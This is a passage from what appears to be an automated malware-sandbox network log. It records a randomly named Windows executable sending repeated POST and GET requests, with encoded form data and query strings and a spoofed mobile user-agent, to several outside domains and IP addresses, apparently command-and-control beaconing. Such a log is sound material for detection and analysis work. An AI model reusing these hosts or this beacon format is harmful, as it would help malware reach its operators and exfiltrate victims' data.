                                                                        Host: www.6822662.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.6822662.xyz
                                                                        Referer: http://www.6822662.xyz/dnjw/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:15:39.491436958 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:15:39 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: d404 Not Found0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        26 | 192.168.2.5 | 50008 | 103.249.106.91 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:15:40.655679941 CET | 813 | OUT | POST /dnjw/ HTTP/1.1
                                                                        Host: www.6822662.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.6822662.xyz
                                                                        Referer: http://www.6822662.xyz/dnjw/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:15:42.222166061 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:15:41 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: d404 Not Found0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        27 | 192.168.2.5 | 50009 | 103.249.106.91 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:15:43.337343931 CET | 1830 | OUT | POST /dnjw/ HTTP/1.1
                                                                        Host: www.6822662.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.6822662.xyz
                                                                        Referer: http://www.6822662.xyz/dnjw/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:15:44.945220947 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:15:44 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: d404 Not Found0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        28 | 192.168.2.5 | 50010 | 103.249.106.91 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:15:45.992675066 CET | 541 | OUT | GET /dnjw/?QhKxhNP=LLuahgeFNd50MfmeR+YO4X7oQIpbAv675x2tVSlUIoVemPDFIi7IcWvJHwj84u5Zt+Ov/a/NakHy5HK7jRYViNkqfDz6ShsEoBWZb9ZpzTMPTjlue++bzVqPhWzfo/q89w==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.6822662.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:15:48.469150066 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:15:48 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Data Ascii: 4c68<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>&#20061;&#37325;&#29615;&#22856;-&#29992;&#25163;&#26426;&#24590;&#20040;&#30475;&#23707;&#22269;&#22823;&#29255;</title><meta name="keywords" content="&#20061;&#37325;&#29615;&#22856;" /><meta name="description" content="&#20061;&#37325;&#29615;&#22856;" /><link href="http://www.6822662.xyz/template/news/news10/css/layout.css" rel="stylesheet" type="text/css" /></head><body><time draggable="3e4fc5"></time><tt dropzone="8e35db"></tt><var date-time="e2ae3a"></var><div dir="896d1d" id="head_top"><area dir="786058"></area><map lang="4be9df"></map><bdo draggable="19b489"></bdo><div lang="f35039" id="header"><dfn dropzone="27ab1d"></dfn><font date-time="7687fa"></font><ins dir="ad3ba4"></ins><div draggable="1dcd8a" class="b896d1 logo"><a href="http://www.6822662.xyz/"><img dropzone="dd63bd" src="/images/logo/46kkrzujrptjzoxgqchojomi46oixznstpszxppfust6pcmh.png?w=230"></a></a><h1> [TRUNCATED]
                                                                        Nov 28, 2024 09:15:48.469310045 CET1236INData Raw: 61 38 22 3e 3c 2f 73 6d 61 6c 6c 3e 3c 73 75 70 20 64 72 61 67 67 61 62 6c 65 3d 22 63 65 62 36 65 36 22 3e 3c 2f 73 75 70 3e 3c 74 69 6d 65 20 64 72 6f 70 7a 6f 6e 65 3d 22 36 61 35 64 30 30 22 3e 3c 2f 74 69 6d 65 3e 3c 64 69 76 20 64 61 74 65
                                                                        Data Ascii: a8"></small><sup draggable="ceb6e6"></sup><time dropzone="6a5d00"></time><div date-time="bb3a47" class="cf3503 top_ad"></div></div><tt date-time="f918f3"></tt><var dir="b109f4"></var><area lang="f82d7a"></area><div dir="9f3bfb" class="d1dcd8 c
                                                                        Nov 28, 2024 09:15:48.469324112 CET1236INData Raw: 3c 2f 76 61 72 3e 3c 61 72 65 61 20 64 72 61 67 67 61 62 6c 65 3d 22 66 64 38 37 63 35 22 3e 3c 2f 61 72 65 61 3e 3c 6d 61 70 20 64 72 6f 70 7a 6f 6e 65 3d 22 38 36 33 30 63 35 22 3e 3c 2f 6d 61 70 3e 3c 64 69 76 20 64 61 74 65 2d 74 69 6d 65 3d
                                                                        Data Ascii: </var><area draggable="fd87c5"></area><map dropzone="8630c5"></map><div date-time="4e88c9" id="breadcrumb"><bdo date-time="229925"></bdo><dfn dir="c3c175"></dfn><font lang="14c9f8"></font><div dir="5ea3ce" class="h1180e postbox"><form action="
                                                                        Nov 28, 2024 09:15:48.470067978 CET1236INData Raw: 7a 2f 78 69 64 61 6f 61 69 6c 69 77 2f 27 3e e5 b8 8c e5 b2 9b e7 88 b1 e7 90 86 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 74 69 6d 65 20 64 69 72 3d 22 35 64 39 61 30 61 22 3e 3c 2f 74 69
                                                                        Data Ascii: z/xidaoailiw/'></a></li></ul></div></div></div><time dir="5d9a0a"></time><tt lang="0cde38"></tt><var draggable="1d7ec6"></var><div draggable="8a3bbd" id="container"><area dropzone="eb970d"></area><map date-time="6bcf2c"></map><bdo
                                                                        Nov 28, 2024 09:15:48.470081091 CET896INData Raw: b5 e5 bd b1 3c 2f 61 3e 3c 2f 64 74 3e 3c 64 64 20 73 74 79 6c 65 3d 22 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 3b 7a 6f 6f 6d 3a 31 3b 22 3e 20 e3 80 8a e6 88 98 e7 8b bc 32 e7 94 b5 e5 bd b1 e3 80 8b e6 98 af e7 94 b1 e5 90 b4 e4 ba ac e6 89 a7
                                                                        Data Ascii: </a></dt><dd style="overflow:auto;zoom:1;"> 22017727
                                                                        Nov 28, 2024 09:15:48.470871925 CET1236INData Raw: 9c a8 e5 bd 93 e6 97 b6 e7 9a 84 e9 a6 99 0d 2e 2e 2e 20 3c 2f 64 64 3e 3c 64 64 20 63 6c 61 73 73 3d 22 71 31 64 30 38 66 20 6c 69 6e 66 6f 22 3e 64 61 74 65 3a 3c 73 70 61 6e 3e 32 30 32 34 2d 31 31 2d 32 38 20 31 35 3a 34 32 3c 2f 73 70 61 6e
                                                                        Data Ascii: ... </dd><dd class="q1d08f linfo">date:<span>2024-11-28 15:42</span> praise:<span></span> views:<span>399</span></dd></dl><dl><dt><a href="http://www.6822662.xyz/Dating/736e40598858.html" class="r0b2ef title"><
                                                                        Nov 28, 2024 09:15:48.470894098 CET1236INData Raw: 80 20 70 72 61 69 73 65 3a 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e e3 80 80 20 76 69 65 77 73 3a 3c 73 70 61 6e 3e 32 38 34 36 3c 2f 73 70 61 6e 3e 3c 2f 64 64 3e 3c 2f 64 6c 3e 3c 64 6c 3e 3c 64 74 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f
                                                                        Data Ascii: praise:<span></span> views:<span>2846</span></dd></dl><dl><dt><a href="http://www.6822662.xyz/Dating/830f499165.html" class="v7f84a title"></a></dt><dd style="overflow:auto;zoom:1;">
                                                                        Nov 28, 2024 09:15:48.471735001 CET1236INData Raw: 69 6e 67 2f 31 37 38 62 34 30 35 39 39 34 31 36 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 7a 64 62 65 64 37 20 74 69 74 6c 65 22 3e e6 88 91 e5 92 8c e6 88 91 e7 9a 84 e5 a5 b3 e5 84 bf 3c 2f 61 3e 3c 2f 64 74 3e 3c 64 64 20 73 74 79 6c 65 3d 22
                                                                        Data Ascii: ing/178b40599416.html" class="zdbed7 title"></a></dt><dd style="overflow:auto;zoom:1;">
                                                                        Nov 28, 2024 09:15:48.471751928 CET1236INData Raw: 20 73 74 79 6c 65 3d 22 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 3b 7a 6f 6f 6d 3a 31 3b 22 3e 20 e3 80 8a e6 9c 89 e5 b8 8c e6 9c 9b e7 9a 84 e7 94 b7 e4 ba ba e3 80 8b e6 98 af e4 b8 80 e9 83 a8 e9 9f a9 e5 9b bd e7 94 b5 e8 a7 86 e5 89 a7 ef bc
                                                                        Data Ascii: style="overflow:auto;zoom:1;"> 2014
                                                                        Nov 28, 2024 09:15:48.472459078 CET1236INData Raw: 22 68 74 74 70 3a 2f 2f 77 77 77 2e 36 38 32 32 36 36 32 2e 78 79 7a 2f 6a 69 75 7a 68 6f 6e 67 68 75 61 6e 6e 61 69 2f 32 2f 22 3e 32 3c 2f 61 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 36
                                                                        Data Ascii: "http://www.6822662.xyz/jiuzhonghuannai/2/">2</a>&nbsp;&nbsp;<a href="http://www.6822662.xyz/jiuzhonghuannai/3/">3</a>&nbsp;&nbsp;<a href="http://www.6822662.xyz/jiuzhonghuannai/4/">4</a>&nbsp;&nbsp;<a href="http://www.6822662.xyz/jiuzhonghuan
                                                                        Nov 28, 2024 09:15:48.589679003 CET1236INData Raw: 32 38 36 22 3e 3c 2f 6d 61 70 3e 3c 62 64 6f 20 64 72 6f 70 7a 6f 6e 65 3d 22 34 65 64 62 36 62 22 3e 3c 2f 62 64 6f 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6b 66 36 30 61 38 20 6c 69 73 74 5f 63 6f 6e 22 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 64
                                                                        Data Ascii: 286"></map><bdo dropzone="4edb6b"></bdo><ul class="kf60a8 list_con"></ul></div></div><dfn date-time="abb388"></dfn><font dir="758f1d"></font><ins lang="e3f5d1"></ins><div date-time="dbed76" class="l82efb isidepanel"><h4></h4><small


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 50011 | 121.43.155.35 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 09:15:54.352663994 CET | 811 | OUT | POST /404o/ HTTP/1.1
Host: www.lingdianyun29.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 208
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Origin: http://www.lingdianyun29.xyz
Referer: http://www.lingdianyun29.xyz/404o/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 28, 2024 09:15:55.805223942 CET | 1236 | IN | HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 14605
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 50012 | 121.43.155.35 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 09:15:57.012895107 CET | 831 | OUT | POST /404o/ HTTP/1.1
Host: www.lingdianyun29.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 228
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Origin: http://www.lingdianyun29.xyz
Referer: http://www.lingdianyun29.xyz/404o/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 28, 2024 09:15:58.512017012 CET | 1236 | IN | HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 14605
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 50013 | 121.43.155.35 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 09:15:59.688683987 CET | 1848 | OUT | POST /404o/ HTTP/1.1
Host: www.lingdianyun29.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 1244
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Origin: http://www.lingdianyun29.xyz
Referer: http://www.lingdianyun29.xyz/404o/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 28, 2024 09:16:01.158471107 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        Content-Type: text/html
                                                                        Content-Length: 14605
                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 50014 | 121.43.155.35 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 09:16:02.334196091 CET | 547 | OUT | GET /404o/?QhKxhNP=WKBQtURp4mxoG42HvJVFdxkBeoRQKLcKkncaZCQ6BKNKWWSe5DM6Y469mdl3/OFUlQwZCGrNWgxnPoxBbE5j38LAsK6uFZ8oMmHn4Vx5wOob/Qku77DXil1QxQESxukZTQ==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.lingdianyun29.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 28, 2024 09:16:03.757971048 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        Content-Type: text/html
                                                                        Content-Length: 14605
                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 50015 | 199.192.23.123 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 09:16:09.778213978 CET | 799 | OUT | POST /d5up/ HTTP/1.1
                                                                        Host: www.learnnow.info
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.learnnow.info
                                                                        Referer: http://www.learnnow.info/d5up/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 28, 2024 09:16:11.036739111 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:16:10 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 50016 | 199.192.23.123 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 09:16:12.448820114 CET | 819 | OUT | POST /d5up/ HTTP/1.1
                                                                        Host: www.learnnow.info
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.learnnow.info
                                                                        Referer: http://www.learnnow.info/d5up/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 28, 2024 09:16:13.712052107 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:16:13 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        35 | 192.168.2.5 | 50017 | 199.192.23.123 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:16:15.108933926 CET | 1836 | OUT | POST /d5up/ HTTP/1.1
                                                                        Host: www.learnnow.info
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.learnnow.info
                                                                        Referer: http://www.learnnow.info/d5up/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:16:16.455202103 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:16:16 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        36 | 192.168.2.5 | 50018 | 199.192.23.123 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:16:17.776678085 CET | 543 | OUT | GET /d5up/?QhKxhNP=t4sGAbB2VavWqiiIadPUj68mTJ7Q54MapR6mUVHY3SwgNZVHyOwsTaauiAAffAhHdKJKrrjT+NERuNHfq0vx0hlOGr9kxI5wEfZ1g7ObOVlc/eoN6Msnk6zs6578MLwdAQ==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.learnnow.info
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:16:19.104046106 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:16:18 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        37 | 192.168.2.5 | 50019 | 52.60.87.163 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:16:24.896471024 CET | 802 | OUT | POST /jcsf/ HTTP/1.1
                                                                        Host: www.carpentry.club
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.carpentry.club
                                                                        Referer: http://www.carpentry.club/jcsf/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Ascii: QhKxhNP=ALgurUGGmMDXGwFlPv8tyoX1EnkpyQYXtOhKPFU9+YKQvDWxcFRCCqi+w7MnEpvaD378Pv6fEyktrgaqtGNulOemMtKQEpwzihKDNhvRw+a4fmkRADaecGzyQi2KxrBMZ2MVF/M9RfNcO6dBjV4Sw6dJTUhpd3K33rfjLl6B2r5MwRzbrMrQAb7dvJULnOU0KhfyPHQ=
                                                                        Nov 28, 2024 09:16:26.085532904 CET | 295 | IN | HTTP/1.1 405 Not Allowed
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:16:25 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 150
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        38 | 192.168.2.5 | 50020 | 52.60.87.163 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:16:27.565336943 CET | 822 | OUT | POST /jcsf/ HTTP/1.1
                                                                        Host: www.carpentry.club
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.carpentry.club
                                                                        Referer: http://www.carpentry.club/jcsf/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Ascii: QhKxhNP=ALgurUGGmMDXHRVlJIAt0IXya3kpnAYTtOtKPEQt+uyQsimxdERCBqi+7bNjApvRD3HrPtufEygtriSqq3Npq+ekANKeJJwzihKDNhr/w+y4eV8RBiadC2z1aC2K6LAkZ2NAF+QTRdlcO+RBmRsT+6dDZ0gHVCrk3LbyPkiChaxp8HCxxuj4T7Xl/ac82+1dQCPCRQEBQAjUlPh4ikSkgZZ6WTdf
                                                                        Nov 28, 2024 09:16:28.752336025 CET | 295 | IN | HTTP/1.1 405 Not Allowed
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:16:28 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 150
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
